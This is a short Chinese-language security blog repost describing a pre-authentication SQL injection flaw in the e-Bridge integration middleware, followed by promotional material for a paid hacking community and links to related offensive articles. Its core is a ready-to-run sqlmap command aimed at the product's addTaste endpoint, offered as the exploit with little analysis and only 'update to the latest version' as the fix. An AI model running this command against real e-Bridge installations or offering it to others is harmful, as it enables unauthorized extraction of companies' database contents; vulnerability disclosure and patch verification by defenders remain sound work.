某微云桥e-Bridge前台SQL注入漏洞复现
2022-10-24 20:7:0 Author: 渗透安全团队(查看原文) 阅读量:622 收藏

 声明

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,开普勒安全团队及文章作者不为此承担任何责任。

    开普勒安全团队拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经开普勒安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

软件简介

某微云桥(e-Bridge)是上海某微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。截止自本手册编制之日e-Bridge已实现了腾讯微信及阿里钉钉开放接口的封装,企业可以通过e-Bridge快速实现基于微信及钉钉的移动办公应用接入。对于某微协同办公产品e-cology更是实现了可视化的配置接入。后续e-bridge将整合更多的互联网信息化资源,让企业能够更加便利的利用开放的互联网资源进行企业信息化建设。

漏洞简介及复现

通过本漏洞,可实现,前台无条件SQL注入,获取系统数据库内容信息。

EXP:sqlmap -u "http://IP:8088/taste/addTaste?company=1&userName=1&openid=1&source=1&mobile=1*" -v 3 --random-agent --level 5

修复方法

更新至最新的版本

星 球 免 费 福 利

 转发公众号本文到朋友圈

 截图到公众号后台第1、3、5名获取免费进入星球

星球的最近主题和星球内部工具一些展示

欢 迎 加 入 星 球 !

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

关注本公众号


文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247493901&idx=2&sn=9f2e1c229f4be1f0ac96bfce5966fe91&chksm=c17614a2f6019db43d506e11a2311058d560011e85050fa2c45fc0595d8d559fe177c6ba1636#rd
如有侵权请联系:admin#unsafe.sh